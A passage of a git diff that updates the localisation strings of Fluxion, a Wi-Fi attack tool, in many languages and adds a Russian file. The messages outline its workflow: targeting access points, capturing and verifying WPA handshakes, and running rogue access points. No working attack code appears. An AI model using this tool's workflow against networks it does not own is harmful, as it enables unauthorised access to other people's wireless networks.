-FLUXIONRemovingExtraWINotice="Entferne freme drahtlose Netzwerkkarten..." -FLUXIONFindingWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." -FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in benutzung" -FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor du FLUXION nutzt." -FLUXIONGatheringWIInfoNotice="Sammeln der Daten von allen Netzwerken..." +FLUXIONInterfaceQuery="Wähle Sie ihre Netzwerkkarte aus" +FLUXIONUnblockingWINotice="Wiederherstellen von allen Netzwerkkarten..." +FLUXIONFindingExtraWINotice="Suche nach Netzwerkkarten..." +FLUXIONRemovingExtraWINotice="Entferne Netzwerkkarten..." +FLUXIONFindingWINotice="Suche nach Netzwerkkarten..." +FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in Benutzung" +FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor Sie FLUXION benutzen" +FLUXIONGatheringWIInfoNotice="Sammeln von Daten, von allen Netzwerken..." FLUXIONUnknownWIDriverError="Netzwerkkartentreiber konnte nicht bestimmt werden" FLUXIONUnloadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." -FLUXIONLoadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." +FLUXIONLoadingWIDriverNotice="Warte auf Treiberantwort \"\$wiSelected\"..." FLUXIONFindingConflictingProcessesNotice="Suche nach Diensten die Probleme verursachen können..." FLUXIONKillingConflictingProcessesNotice="Beende Diensten die Probleme verursachen können..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Die Physische Schnittstelle konnte nicht ermittelt werden" -FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im Monitor Mode" +FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im sogenannten Monitor Mode" FLUXIONMonitorModeWIEnabledNotice="${CGrn}Monitormode konnte erfolgreich gestartet werden" FLUXIONMonitorModeWIFailedError="${CRed}Monitormode konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starte Netzwerkscanner" -FLUXIONStartingScannerTip="Wenn nach etwa 5 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" +FLUXIONStartingScannerTip="Wenn nach etwa 30 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" FLUXIONPreparingScannerResultsNotice="Analysieren von allen gesammelten Daten..." FLUXIONScannerFailedNotice="Netzwerkkarte ist möglichweise nicht geeignet ( Keine Netzwerke gefunden )" FLUXIONScannerDetectedNothingNotice="Keine Netzwerke konnten gefunden werden" @@ -30,14 +30,15 @@ FLUXIONHashFileDoesNotExistError="Hash Datei existiert nicht" FLUXIONHashInvalidError="${CRed}Fehler$CClr, falscher Hash" FLUXIONHashValidNotice="${CGrn}Erfolgreich$CClr,Hash wurde erfolgreich verifiziert" FLUXIONPathToHandshakeFileQuery="Geben sie den Pfad zum Handshake an $CClr(Beispiel: /.../dump-01.cap)" -FLUXIONAbsolutePathInfo="Geben sie den Absoluten Pfad ein" +FLUXIONAbsolutePathInfo="Geben sie den absoluten Pfad ein" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelQuery="Wähle deinen Netzwerkkanal aus" -FLUXIONScannerChannelOptionAll="Alle Netzwerkkanäle" -FLUXIONScannerChannelOptionSpecific="Spezifische Kanal(e)" +FLUXIONScannerChannelQuery="Wähle deinen Netzwerkfrequenz aus" +FLUXIONScannerChannelOptionAll="Alle Netzwerkfrequenzen" +FLUXIONScannerChannelOptionSpecific="Spezifische Frequenz(en)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelSingleTip="Einzelner Kanal" -FLUXIONScannerChannelMiltipleTip="Mehrere Kanäle" +FLUXIONScannerChannelSingleTip="Einzelne Frequenz" +FLUXIONScannerChannelMiltipleTip="Mehrere Frequenzen" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> @@ -48,15 +49,15 @@ FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Langsame Verbindung FLUXIONHashSourceQuery="Wähle eine Methode aus um den Handshake zu erlangen" FLUXIONHashSourcePathOption="Handshake Pfad eingeben" FLUXIONHashSourceRescanOption="Handshake Ordner neu einlesen" -FLUXIONFoundHashNotice="Ein hash wurde für das Netzwerk gefunden" -FLUXIONUseFoundHashQuery="Möchten sie dieses Netzwerk nutzen" -FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu Verifizieren" -FLUXIONHashVerificationMethodPyritOption="Pyrit Verifizierung (${CGrn}Empfohlen$CClr)" -FLUXIONHashVerificationMethodAircrackOption="Aircrack Verfizierung (${CYel}Unglaubwürdig$CClr)" +FLUXIONFoundHashNotice="Ein Hash wurde für das Netzwerk gefunden" +FLUXIONUseFoundHashQuery="Möchten Sie dieses Netzwerk nutzen?" +FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu verifizieren" +FLUXIONHashVerificationMethodPyritOption="Pyrit verifizierung (${CGrn}Empfohlen$CClr)" +FLUXIONHashVerificationMethodAircrackOption="Aircrack verfizierung (${CYel}Nicht empfohlen$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Wählen Sie einen drahtlosen Angriff für den Zugangspunkt aus" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr Angriff gestartet" -FLUXIONSelectAnotherAttackOption="Wähle einen anderen Angriff" +FLUXIONSelectAnotherAttackOption="Wählen Sie einen anderen Angriff" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralBackOption="${CRed}Zurück" FLUXIONGeneralExitOption="${CRed}Ausgang" @@ -65,7 +66,7 @@ FLUXIONGeneralNotFoundError="Nicht gefunden" FLUXIONGeneralXTermFailureError="${CRed}Xterm Terminal konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONCleanupAndClosingNotice="Aufräumen und schließen" -FLUXIONKillingProcessNotice="Killing ${CGry}\$targetID$CClr" +FLUXIONKillingProcessNotice="Beende ${CGry}\$targetID$CClr" FLUXIONRestoringPackageManagerNotice="Restoring ${CCyn}\$PackageManagerCLT$CClr" FLUXIONDisablingMonitorNotice="Deaktivierung der Netzwerkkarte" FLUXIONDisablingExtraInterfacesNotice="Deaktivierung der Netzwerkkarte" diff --git a/language/el.sh b/language/el.sh index acca561..010cda0 100755 --- a/language/el.sh +++ b/language/el.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Εισαγετε διαδρομή αρχειου" FLUXIONScannerChannelQuery="Επίλεξτε κανάλι" FLUXIONScannerChannelOptionAll="Όλα τα κανάλια" FLUXIONScannerChannelOptionSpecific="Συγκεκριμένο(α) κανάλι(α)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Ενα κανάλι" FLUXIONScannerChannelMiltipleTip="Πολλαπλά κανάλια" diff --git a/language/en.sh b/language/en.sh index 6f9ea4a..40b64d1 100755 --- a/language/en.sh +++ b/language/en.sh @@ -3,22 +3,36 @@ # native: English FLUXIONInterfaceQuery="Select a wireless interface" -FLUXIONUnblockingWINotice="Unblocking all wireless interfaces..." -FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." +FLUXIONAllocatingInterfaceNotice="Allocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONDeallocatingInterfaceNotice="Deallocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONReidentifyingInterface="Renaming interface." +FLUXIONUnblockingWINotice="Unblocking all wireless interfaces." + +FLUXIONTargetTrackerInterfaceQuery="Select an interface for target tracking." + +#FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." FLUXIONSelectedBusyWIError="The wireless interface selected appears to be currently in use!" -FLUXIONSelectedBusyWITip="Run \"export FLUXIONWIKillProcesses=1\" before FLUXION to use it." +FLUXIONSelectedBusyWITip="This is usually caused by the network manager using the interface selected. We recommened you$CGrn gracefully stop the network manager$CClr or configure it to ignored the selected interface. Alternatively, run \"export FLUXIONWIKillProcesses=1\" before fluxion to kill it but we suggest you$CRed avoid using the killer flag${CClr}." FLUXIONGatheringWIInfoNotice="Gathering interface information..." FLUXIONUnknownWIDriverError="Unable to determine interface driver!" -FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to unload..." -FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to load..." +FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$interface\" to unload..." +FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$interface\" to load..." FLUXIONFindingConflictingProcessesNotice="Looking for notorious services..." FLUXIONKillingConflictingProcessesNotice="Killing notorious services..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Unable to determine interface's physical device!" FLUXIONStartingWIMonitorNotice="Starting monitor interface..." -FLUXIONMonitorModeWIEnabledNotice="${CGrn}Interface monitor mode enabled." -FLUXIONMonitorModeWIFailedError="${CRed}Interface monitor mode failed!" +FLUXIONInterfaceAllocatedNotice="${CGrn}Interface allocation succeeded!" +FLUXIONInterfaceAllocationFailedError="${CRed}Interface reservation failed!" + + +FLUXIONIncompleteTargettingInfoNotice="Missing essid, bssid, or channel information!" + +FLUXIONTargettingAccessPointAboveNotice="Fluxion is targetting the access point above." + +FLUXIONContinueWithTargetQuery="Continue with this target?" + # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starting scanner, please wait..." FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the FLUXION Scanner." @@ -29,8 +43,10 @@ FLUXIONScannerDetectedNothingNotice="No access points were detected, returning.. FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" -FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /.../dump-01.cap)" +FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /path/to/file.cap)" +FLUXIONPathToHandshakeFileReturnTip="To go back, leave the hash path blank." FLUXIONAbsolutePathInfo="Absolute path" +FLUXIONEmptyOrNonExistentHashError="${CRed}Error$CClr, path points to non-existing or empty hash file." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Select a channel to monitor" FLUXIONScannerChannelOptionAll="All channels" @@ -41,23 +57,23 @@ FLUXIONScannerChannelMiltipleTip="Multiple channels" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONAPServiceQuery="Select an access point service" -FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" -FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" -# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" -FLUXIONHashSourceRescanOption="Handshake directory (rescan)" +FLUXIONHashSourceRescanOption="Rescan handshake directory" FLUXIONFoundHashNotice="A hash for the target AP was found." FLUXIONUseFoundHashQuery="Do you want to use this file?" +FLUXIONUseFoundHashOption="Use hash found" +FLUXIONSpecifyHashPathOption="Specify path to hash" FLUXIONHashVerificationMethodQuery="Select a method of verification for the hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Select a wireless attack for the access point" -FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attack in progress..." +FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONGeneralSkipOption="${CYel}Skip" FLUXIONGeneralBackOption="${CRed}Back" FLUXIONGeneralExitOption="${CRed}Exit" FLUXIONGeneralRepeatOption="${CRed}Repeat" diff --git a/language/es.sh b/language/es.sh index 81e2faa..a2d0142 100755 --- a/language/es.sh +++ b/language/es.sh @@ -44,6 +44,7 @@ FLUXIONScannerHeader="FLUXION Escáner" FLUXIONAPServiceQuery="Seleccione Opción de Ataque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recomendado$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Conexión más lenta$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" diff --git a/language/fr.sh b/language/fr.sh index c8a7a09..88156b8 100755 --- a/language/fr.sh +++ b/language/fr.sh @@ -44,6 +44,7 @@ FLUXIONScannerHeader="Scanner FLUXION" FLUXIONAPServiceQuery="Sélectionnez une option d'attaque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommandé$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Connexion plus lente$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Sélectionnez une méthode de récupération de handshake" FLUXIONHashSourcePathOption="Chemin du fichier capturé" diff --git a/language/it.sh b/language/it.sh index 42d2a15..57fba2d 100755 --- a/language/it.sh +++ b/language/it.sh @@ -53,6 +53,7 @@ FLUXIONUseFoundHashQuery="Vuoi usare questo file?" FLUXIONHashVerificationMethodQuery="Seleziona il metodo di verifica dell'hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}raccomandato$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}inaffidabile$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Seleziona la tua scelta" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attacco in corso..." diff --git a/language/pl.sh b/language/pl.sh index b709a78..f8a08a9 100644 --- a/language/pl.sh +++ b/language/pl.sh @@ -31,6 +31,7 @@ FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" FLUXIONPathToHandshakeFileQuery="Podaj ścieżkę dostępu do pliku handshake $CClr(Example: /.../dump-01.cap)" FLUXIONAbsolutePathInfo="Absolute path" +FluxionRestartOption="Restart"s # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Wybierz kanał do monitorowania" FLUXIONScannerChannelOptionAll="Wszystkie kanały" diff --git a/language/pt-br.sh b/language/pt-br.sh index 64e01e3..4b31b86 100755 --- a/language/pt-br.sh +++ b/language/pt-br.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Sintetizando os resultados da varredura, aguarde..." FLUXIONScannerFailedNotice="Wireless card não suportado (sem APs encontrados)" FLUXIONScannerDetectedNothingNotice="Sem APs encontrados, retornando..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Arquivo hash não existe!" FLUXIONHashInvalidError="${CRed}Error$CClr, arquivo hash inválido!" diff --git a/language/ro.sh b/language/ro.sh index f60074c..23495b6 100755 --- a/language/ro.sh +++ b/language/ro.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/ru.sh b/language/ru.sh new file mode 100755 index 0000000..bd1647d --- /dev/null +++ b/language/ru.sh @@ -0,0 +1,97 @@ +#!/bin/bash +# Russian +# native: Русский + +FLUXIONInterfaceQuery="Выберите беспроводной интерфейс" +FLUXIONAllocatingInterfaceNotice="Выделение зарезервированного интерфейса $CGrn\"\$interfaceIdentifier\"." +FLUXIONDeallocatingInterfaceNotice="Перераспределение зарезервированного интерфейса $CGrn\"\$interfaceIdentifier\"." +FLUXIONReidentifyingInterface="Переименование интерфейса." +FLUXIONUnblockingWINotice="Разблокирование всех беспроводных интерфейсов." + +FLUXIONTargetTrackerInterfaceQuery="Выберите интерфейс для отслеживания целей." + +#FLUXIONFindingExtraWINotice="Поиск посторонних беспроводных интерфейсов..." +FLUXIONRemovingExtraWINotice="Удаление посторонних беспроводных интерфейсов..." +FLUXIONFindingWINotice="Поиск доступных беспроводных интерфейсов..." +FLUXIONSelectedBusyWIError="Выбранный беспроводной интерфейс, по-видимому, используется в настоящее время!" +FLUXIONSelectedBusyWITip="Обычно это вызвано сетевым менеджером (network manager), использующим выбранный интерфейс. Рекомендуется$CGrn правильно остановить сетевой менеджер $CClr или настроить его на игнорирование выбранного интерфейса. В качестве альтернативы выполняйте \"export FLUXIONWIKillProcesses=1\" перед запуском fluxion, чтобы выгрузить сетевой менеджер, но рекомендуется$CRed избегать использование этого флага${CClr}." +FLUXIONGatheringWIInfoNotice="Сбор информации об интерфейсе..." +FLUXIONUnknownWIDriverError="Не удалось определить драйвер интерфейса!" +FLUXIONUnloadingWIDriverNotice="Ожидание выгрузки интерфейса \"\$interface\"..." +FLUXIONLoadingWIDriverNotice="Ожидание поднятия интерфейса \"\$interface\"..." +FLUXIONFindingConflictingProcessesNotice="Поиск конфликтующих служб..." +FLUXIONKillingConflictingProcessesNotice="Остановка конфликтующих служб..." +FLUXIONPhysicalWIDeviceUnknownError="${CRed}Невозможно определить физическое устройство интерфейса!" +FLUXIONStartingWIMonitorNotice="Запуск интерфейса монитора..." +FLUXIONInterfaceAllocatedNotice="${CGrn}Успешное распределение интерфейса!" +FLUXIONInterfaceAllocationFailedError="${CRed}Не удалось выполнить резервирование интерфейса!" + + +FLUXIONIncompleteTargettingInfoNotice="Отсутствует информация об essid, bssid или канале!" + +FLUXIONTargettingAccessPointAboveNotice="Fluxion нацелен на вышеприведённую точку доступа." + +FLUXIONContinueWithTargetQuery="Продолжить с этой целью?" + +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONStartingScannerNotice="Запуск сканера, пожалуйста, подождите..." +FLUXIONStartingScannerTip="Через пять секунд после появления целевой точки ТД закройте сканер FLUXION." +FLUXIONPreparingScannerResultsNotice="Подготовка результатов сканирования, пожалуйста, ожидайте..." +FLUXIONScannerFailedNotice="Возможно, беспроводная карта не поддерживается (точки доступа не найдены)" +FLUXIONScannerDetectedNothingNotice="Точки доступа не обнаружены, возвращаемся назад..." +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONHashFileDoesNotExistError="Хэш-файл (файл с рукопожатием) не существует!" +FLUXIONHashInvalidError="${CRed}Ошибка$CClr, неверный файл рукопожатия!" +FLUXIONHashValidNotice="${CGrn}Успех$CClr, верификация рукопожатия прошла успешно!" +FLUXIONPathToHandshakeFileQuery="Введите путь до файла рукопожатия $CClr(Пример: /путь/до/file.cap)" +FLUXIONPathToHandshakeFileReturnTip="Чтобы вернуться назад, оставьте путь до файла рукопожатия пустым." +FLUXIONAbsolutePathInfo="Абсолютный путь" +FLUXIONEmptyOrNonExistentHashError="${CRed}Ошибка$CClr, введённый путь указывает на несуществующий или пустой файл рукопожатия." +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONScannerChannelQuery="Выберите канал для мониторинга" +FLUXIONScannerChannelOptionAll="Все каналы" +FLUXIONScannerChannelOptionSpecific="Конкретный канал (каналы)" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONScannerChannelSingleTip="Один канал" +FLUXIONScannerChannelMiltipleTip="Несколько каналов" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONScannerHeader="Сканер FLUXION" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONHashSourceQuery="Выберите способ получения рукопожатия" +FLUXIONHashSourcePathOption="Путь к файлу захвата" +FLUXIONHashSourceRescanOption="Повторное сканирование директории рукопожатия" +FLUXIONFoundHashNotice="Был найден хэш (рукопожатие) для целевой точки доступа." +FLUXIONUseFoundHashQuery="Вы хотите использовать этот файл?" +FLUXIONUseFoundHashOption="Использовать найденное рукопожатие" +FLUXIONSpecifyHashPathOption="Укажите путь к рукопожатию" +FLUXIONHashVerificationMethodQuery="Выберите метод проверки рукопожатия" +FLUXIONHashVerificationMethodPyritOption="проверка с помощью pyrit (${CGrn}рекомендуется$CClr)" +FLUXIONHashVerificationMethodAircrackOption="проверка с помощью aircrack-ng (${CYel}ненадёжная$CClr)" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONAttackQuery="Выбор беспроводной атаки для точки доступа" +FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr идёт атака..." +FLUXIONSelectAnotherAttackOption="Выбор другой атаки" +FluxionRestartOption="Перезапуск" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONGeneralSkipOption="${CYel}Пропустить" +FLUXIONGeneralBackOption="${CRed}Назад" +FLUXIONGeneralExitOption="${CRed}Выход" +FLUXIONGeneralRepeatOption="${CRed}Повторить" +FLUXIONGeneralNotFoundError="Не найдено" +FLUXIONGeneralXTermFailureError="${CRed}Не удалось запустить xterm (возможно неправильная настройка, безголовая машина)." +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONCleanupAndClosingNotice="Очистка и закрытие" +FLUXIONKillingProcessNotice="Закрытие ${CGry}\$targetID$CClr" +FLUXIONRestoringPackageManagerNotice="Восстановление ${CCyn}\$PackageManagerCLT$CClr" +FLUXIONDisablingMonitorNotice="Отключение режима монитора" +FLUXIONDisablingExtraInterfacesNotice="Отключение дополнительный интерфейсов" +FLUXIONDisablingPacketForwardingNotice="Отключение ${CGry}форвардинга (переадресации) пакетов" +FLUXIONDisablingCleaningIPTablesNotice="Очистка ${CGry}iptables" +FLUXIONRestoringTputNotice="Восстановление ${CGry}tput" +FLUXIONDeletingFilesNotice="Удаление ${CGry}файлов" +FLUXIONRestartingNetworkManagerNotice="Восстановление ${CGry}Network-Manager" +FLUXIONCleanupSuccessNotice="Очистка выполнена успешно!" +FLUXIONThanksSupportersNotice="Спасибо что пользуетесь FLUXION" +# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> + +# FLUXSCRIPT END diff --git a/language/sk.sh b/language/sk.sh index 9cf48e6..e2663d7 100644 --- a/language/sk.sh +++ b/language/sk.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Päť sekúnd po objavení sa cieľového AP, zavrite FLUXIONPreparingScannerResultsNotice="Výsledky scanu sa pripravujú, čakajte..." FLUXIONScannerFailedNotice="Bezdrôtová sieťová karta nemusí byť podporovaná (nenašli sa žiadne AP)" FLUXIONScannerDetectedNothingNotice="Žiadne prístupové body neboli najdené, vraciam sa..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Súbor 'hash' neexistuje!" FLUXIONHashInvalidError="${CRed}Error$CClr, nesprávny 'hash' súbor!" diff --git a/language/sl.sh b/language/sl.sh index 7749eea..4838b1f 100755 --- a/language/sl.sh +++ b/language/sl.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/tk.sh b/language/tk.sh index 6669584..781417b 100755 --- a/language/tk.sh +++ b/language/tk.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/zh.sh b/language/zh.sh index 64d1cac..8f1da14 100755 --- a/language/zh.sh +++ b/language/zh.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="综合扫描的结果获取中,请稍等..." FLUXIONScannerFailedNotice="你的无线网卡好像不支持 (没有发现APs)" FLUXIONScannerDetectedNothingNotice="没有发现访问点, 请返回重试..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash文件不存在!" FLUXIONHashInvalidError="${CRed}错误$CClr, 无效的Hash文件!" diff --git a/lib/HashUtils.sh b/lib/HashUtils.sh index ab7fb9f..cb12671 100755 --- a/lib/HashUtils.sh +++ b/lib/HashUtils.sh @@ -6,46 +6,49 @@ readonly 